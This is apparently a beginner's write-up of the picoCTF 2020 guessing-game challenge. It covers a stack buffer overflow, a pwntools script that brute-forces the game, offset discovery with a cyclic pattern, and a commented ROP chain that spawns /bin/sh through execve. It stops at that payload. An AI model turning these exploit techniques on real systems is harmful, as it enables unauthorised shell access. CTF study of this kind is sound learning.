This year I decided to compete in the picoCTF 2020 Mini-Competition as my first CTF.

This is the first post in a series covering the tasks of the competition.

The task

A screenshot of the competition task.

The shown task can be found here

The code

int main(int argc, char **argv){

	int res;
	
	printf("Welcome to my guessing game!\n\n");
	
	while (1) {
		res = do_stuff();
		if (res) {
			win();
		}
	}
	
	return 0;
}

The program consists of a loop calling do_stuff(). In case do_stuff returns a truthy value, we also call win(). Examining win() we can spot a buffer overflow:

#define BUFSIZE 100

void win() {
	char winner[BUFSIZE];
	printf("New winner!\nName? ");
	fgets(winner, 360, stdin);
	printf("Congrats %s\n\n", winner);
}

We get prompted to enter a name (which can be up to 360 characters including a null character). This name gets copied into a buffer that has a size of 100 characters.This results in a buffer overflow if we enter a name longer than 99 characters.

To exploit the buffer overflow, we need to win the game.

But how do we win the game?

long increment(long in) {
	return in + 1;
}

long get_random() {
	return rand() % BUFSIZE;
}

int do_stuff() {
	long ans = get_random();
	ans = increment(ans);
	int res = 0;
	
	printf("What number would you like to guess?\n");
	char guess[BUFSIZE];
	fgets(guess, BUFSIZE, stdin);
	
	long g = atol(guess);
	if (!g) {
		printf("That's not a valid number!\n");
	} else {
		if (g == ans) {
			printf("Congrats! You win! Your prize is this print statement!\n\n");
			res = 1;
		} else {
			printf("Nope!\n\n");
		}
	}
	return res;
}

Sadly there seems to be no way to cheat, we just have to luckily guess a number between 1 and 100. However, computers being fast that should not be an issue.

So before diving into exploiting the bufferoverflow we should be able to reliably win the game.

For this, we can use pwnlib:

from pwn import *
import time

LOCAL = True

local_bin = "./vuln"

if LOCAL:
    p = process(local_bin)

else:
    p = remote('jupiter.challenges.picoctf.org', 50581)

progress = log.progress('Winning the game...')
attempts = 1
start_time = time.time()

# win the game

p.sendline(b'1')
result = p.recvline_contains((b'Nope!', b'New winner'))
while result == b'Nope!':
    current_time = time.time()
    time_per_attempt = (current_time - start_time) / attempts
    needed_attempts = 300 - attempts
    eta = needed_attempts * time_per_attempt

    progress.status('{}/~300 attempts, {:0.3}s per attempt ETA~{:0.3}s'.format(attempts, time_per_attempt, eta))
    attempts += 1
    p.sendline(b'1')
    result = p.recvline_contains((b'Nope!', b'New winner'))
progress.success('We won!!')

This code is setup so we can develop our exploit locally (with debugger etc.) and then switch to remote after we are confident that it works.

All this code does is repeatedly guess 1 and send it to the process until we’ve won.

Now we can try to win the game:

And remotely so we can see our fancy progress bars and feel prouder:

Now that we can reliably reach the bufferoverflow after an amount of time we’re ready to exploit it.

The exploit

The stack stores the current return address in close proximity to the buffer we are overflowing. Our first step is to exactly find out at which buffer position that address sits. For that we could manually inspect the program in a debugger, but pwnlib supplies us a handy utility.

pwnlib.utils.cyclic.cyclic(1000, 8) generates a De Bruijn sequence.

This is a sequence that is unique for every substring of length 8.

So [0..8] != [1..9], [1..9] != [2..10] etc.. This implies if we can a random slice of the sequence [x..(x+8)] we can figure out x by just looking at the content.

We override the return address with an unknown part of the sequence, and the program tries to jump to that address.

This results in a SIGSEGV, a result of accessing invalid memory, showing us exactly what address was accessed.

This information is enough to figure out at which offset from the buffer the return address is stored, 120 in our case.

OFFSET = None
if OFFSET == None:
    log.progress('Determining OFFSET...')
    p.clean()
    payload = cyclic(1000, n=8)
    p.sendline(payload)
    p.wait()
    core = Corefile('./core')
    found_offset = cyclic_find(core.fault_addr, n=8)
    log.progress('Found OFFSET: {}, set the variable and rerun the exploit'.format(found_offset))
    exit()

At this point we are able to continue executing from an arbitrary address. Combined with our ability to write abitrary data into memory e.g. a program, this used to be enough to run shellcode.

Nowadays, we usually can not execute from memory in the stack because of Executable space protection. We are able to write a program into the buffer, but trying to execute it would result in a crash.

To execute a (nearly) arbitrary program, we need to use Return-oriented programming.

Pwnlib exposes tools to find the necessary gadgets. The syntax for that is not documented too well, so I needed to use an external tool to find one of the gadgets.

The shellcode

Our goal is to gain shell access, the easiest way to accomplish this is to call the execve() system call with /bin/sh.

Finding a tailored data copy routine or writing one ourself within the constraints is fairly difficult. Luckily we are on a 64 bit system and our payload /bin/sh fits entirly within one reigster.

payload = (
# Fill the buffer to the point where the next 4 bytes
# override the return address
OFFSET + 
# POP the next value into RAX
p64(POP_RAX) +
# We use .bss as our scratchpad, it is readable and writable
p64(elf.bss()) +
# POP the string /bin/sh into RDX
p64(POP_RDX) +
SH_STRING +
# Move the contents of RDX (/bin/sh) into the memory
# pointed to by RAX (the beginning of the .bss seciton)
p64(MOV_PRAX_RDX) +
# Prepare for calling execv,
# load the system call number of it (59) into RAX
p64(POP_RAX) +
p64(59) +
# Load the address of the /bin/sh string into RDI
# this is the pathname argument of execve
p64(POP_RDI) +
p64(elf.bss()) +
# We do not have any arguments, load a null pointer into RSI
p64(POP_RSI) +
p64(0) +
p64(POP_RDX) +
# We do not an environemnt, load a null pointer into RDX
p64(0) +
# Do the system call
p64(SYSCALL))